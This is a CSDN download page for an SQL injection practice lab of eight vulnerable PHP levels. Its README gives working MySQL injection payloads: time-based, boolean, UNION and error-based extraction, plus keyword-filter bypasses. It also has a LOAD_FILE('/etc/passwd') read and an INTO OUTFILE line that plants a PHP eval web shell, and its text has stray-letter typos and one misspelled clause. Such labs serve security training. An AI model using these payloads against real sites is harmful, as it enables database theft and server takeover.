SQL注入测试靶场.zip资源-CSDN文库

共12个文件

php：11个

md：1个

需积分: 5 163 浏览量 2024-01-16 17:56:37 上传评论收藏 16KB ZIP 举报

靶场，是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中，靶场扮演着重要的角色，尤其是在网络安全领域，靶场成为培养和提高安全专业人员技能的重要平台。首先，靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用，靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作，全面提升其实战能力。其次，靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中，安全专业人员可以模拟攻击者的行为，发现系统和应用的漏洞，并进行渗透测试，从而及时修复和改进防御机制。同时，这也为防御方提供了锻炼机会，通过对抗攻击提高防御能力。靶场的搭建还促进了团队协作与沟通。在攻防对抗中，往往需要多人协同作战，团队成员之间需要密切配合，共同制定攻击和防御策略。这有助于培养团队合作意识，提高协同作战的效率。此外，靶场为学习者提供了一个安全的学习环境。在靶场中，学生可以通过实际操作掌握安全知识，了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观，有助于深化对安全领域的理解。最后，靶场也是安全社区交流的平台。在靶场中，安全从业者可以分享攻防经验，交流最新的安全威胁情报，共同探讨解决方案。这有助于建立更广泛的安全社区，推动整个行业的发展。总体而言，靶场在信息安全领域具有重要地位，为安全专业人员提供了实战演练的机会，促进了团队协作与沟通，为学习者提供了安全的学习环境，同时也是安全社区交流的重要平台。通过靶场的实践操作，安全从业者能够更好地应对不断演变的网络威胁，提高整体的安全水平。

资源推荐

资源详情

资源评论

收起资源包目录

SQL注入测试靶场.zip （12个子文件）

AJT-code

sql-8.php 5KB

sql-3.php 3KB

sql-4.php 3KB

sql-5.php 3KB

sql-connect.php 334B

sql-2.php 3KB

sql-7.php 3KB

sql-6.php 3KB

README.md 7KB

sql-1.php 3KB

setup-db.php 3KB

#SQL—Injection 应用程序在向后台数据库传递SQLc查询时，如果为攻击者提供了影响该查询的能力，就会引起sql注入。简而言之就是程序代码在编写的时候没有对用户可控的变量进行合适的判断d和处理导致不可信数据被作为命令或是数据查询的一部分发送到用户客户端，导致漏洞的发生。 ##Mysql注入 ###Mysql数据库版本 - show version(); < 5.0 没有information_schema数据库; - show version(); > 5.0 有内置information_schema数据库，可以快速查找表明; - show version(); > 5.5 有内置information_schema数据库和performance_schema数据库(用于收集数据库服务器性能参数)； ###注释符 - `#` `/*` `-- -` `;%00` - 值得注意：在Accsee数据库中没有注释符的存在，但是在一定条件下可以使用%00来代替注释符。 ###注入方式 - inband,利用攻击者和存在漏洞的wen程序之间现有的f通信方式来进行sql注入并提取数据，Union注入、报错注入(error-base)； - inference,通过传入不同的参数值来观察web程序表现的差异性来进行sql注入并提取数据，布尔值注入(bool)、时间注入(time-base)； - Out-of-inband，当现有的通信渠道不能提取数据d时，我们可以利用其他渠道来尝试提取数据，如e-mail、HTTP/DNS、文件系统； ###Mysql 读写文件 - LOAD_FILE() - SELECT LOAD_FILE('/etc/passwd'); - Mysqlyd用户必须有文件读取的权利；文件大小要小于max_allowed_packet; - INTO OUTFILE() - SELECT '<?php eval($_REQUEST[\'s\']);>' INTO FILE '/var/www/1.php'; - INTO OUTFILE不能覆盖已经存在的文件； ###常用函数 - `@@VERSION()` `VERSION()` `current_user` `database()` `@@HOSTNAME` ##SQL - [SQL-1](#sql-1) - [SQL-2](#sql-2) - [SQl-3](#sql-3) - [SQl-4](#sql-4) - [SQL-5](#sql-5) - [SQl-6](#sql-6) - [SQl-7](#sql-7) - [SQl-8](#sql-8) ##SQL-1 ###mysql_query - `SELECT * FROM users WHERE id=1 LIMIT 0,1;` ###Payload - time-based blind - `id=1 AND SLEEP(5) ` - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)` - boolean-based blind - `id=1 AND 6036=6036` - UNION query - `id=-3563 UNION ALL SELECT NULL,NULL,CONCAT()--` ##SQL-2 对比于SQL-1的直接传值$id，SQL-2中在SQL-1注入Payload的基础上需要对y单引号`'`进行闭合； ###mysql_query - `SELECT * FROM users WHERE id='$id' LIMIT 0,1;` ###PayLoad - time-based blind - `id=1' AND SLEEP(5) AND 'sql'='sql` - `id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa) and 'Kevinsa'='Kevinsa` - boolean-based blind - `id=1' AND 6036=6036 AND 'Drgh'='Drgh` - UNION query - `id=-3563' UNION ALL SELECT NULL,NULL,CONCAT()-- Kevinsa'` ##SQL-3 ###mysql_query - `SELECT * FROM users WHERE id=($id) LIMIT 0,1;` ###Payload - time-based blind - `?id=1) AND SLEEP(5) AND (1=1# ` - boolen-based blind - `?id=1) AND 1378=1379 AND ('ARzY'='ARzY'` ##SQL-4 可以看到SQL-4与SQL-1是相类似的，在不需要闭合任何符合的情况下就可以进行SQL注入，但是在SQL-4中值得一提的是，SQL-4中开启了`mysql_error();`，r所以我们可以利用报错注入的方式来提取数据。 ###mysql_query - ``` $sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1"; mysql_query($sql_query); echo mysql_error; ``` ###Payload - error-based blind - `?id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)` - 主键重复性报错，floor(rand(0)*2)、count(*)、group by，报错方式的原理是：使用rand()查询时，由于group by的存在floor(rand(0)*2)会被执行一次，当x虚拟表不存在时，插入虚拟表会被再执行一次，而报错正是因为floor(rand(0)*2)的确定性011；文章：Wooyun知识库-Mysql报错注入原理分析(count()、rand()、group by) - `id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))` - extractvalue是mysql5.1提供的内置XML文件解析和修改函数，函数语法为extratvalue(XML_document,XPath_string),其中的XML_document是string格式，而当我们传入一个数值时，extractvalue()函数会产生报错； - `id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))` - extractvalue、updatexml都属于xpath语法错误进行报错注入，version>5.1.5,提供的两个XML查询和修改哈苏宁沪，extractvalue负责在xml文档中按照xpath语法查询节点内容，而updatexml负责修改查询到的内容。extractvalue、updatexml函数的第二个参数都是要去符合xpath语法的字符串，如果我们传入数字就能产生报错。updatexml同样是mysql5.1中提供的内置xml文件解析和修改函数，函数语法为updatexml(XML_document,XPath_string,new_value),其中的XML_document是string格式，而当我们传入一个数值时，updatexml()函数会产生报错； ###About - version > 5.0.12,我们可以利用name_const()函数的重复产生报错来提取数据。select * from(select name_const(version()),1),name_const(version(),1); - 利用整形溢出进行报错注入提取数据，5.5.5 > version > 5.5可以返回信息，同时报错信息也是有长度限制的，#define ERRMSGSIZE (512) ##SQL-5 虽然SQL-5的csql查询方式和SQL-1一样，但是php代码中没有对结果的输出点，而且注入布尔值判断也不影响页面正常输出任何内容，所以我们只能利用time-based blind。 ###mysql_query - `SELECT * FROM users WHERE id='$id' LIMIT 0,1; /* echo mysql_query(); */` ###Payload - time-based blind - `id=1 AND SLEEP(5) ` - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)` ##SQL-6 SQL-6对比与SQL-1多了一层粗糙的过滤，`function sqlentities()`以黑名单的方式对id参数值进行过滤。 ###mysql_query - ``` function sqlentities($var) { $var = str_replace("select"," ",$var); $var = str_replace("sleep"," ",$var); $var = str_replace("and"," ",$var); $var = str_replace("from"," ",$var); $var = str_replace("where"," ",$var); $var = str_replace("union"," ",$var); return $var; } ``` ###Payload 最简单的方式，我们一大小写混淆来绕过过滤 - time-based blind - `id=1 AND SLEEP(5) ` - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)` - boolean-based blind - `id=1 AND 6036=6036` - UNION query - `id=-3563 UNION ALL SELECT NULL,NULL,CONCAT()--` ##SQL-7 相对于SQL-6，SQL-7匹配为大小写匹配，我们不能用大小写混淆来绕过过滤。 ###mysql_quey - ``` function sqlentities($var) { $var = preg_replace('/(select|where|sleep|and|from|union)/i',"",$var); return $var; } } ``` ###Payload - time-based blind - `id=1 ANandD SLandEEP(5) ` - `id=1 AND (SELEandCT * FandROM (SandELECT(SLandEEP(5)))Kevinsa)` - boolean-based blind - `id=1 ANandD 6036=6036` - UNION query - `id=-3563 UNandION ALL SELECandT NULL,NULL,CONCAT()--` ##SQL-8 ###mysql_query - ``` $name=$_POST['username']; $password=$_POST['password']; ```

评论收藏

内容反馈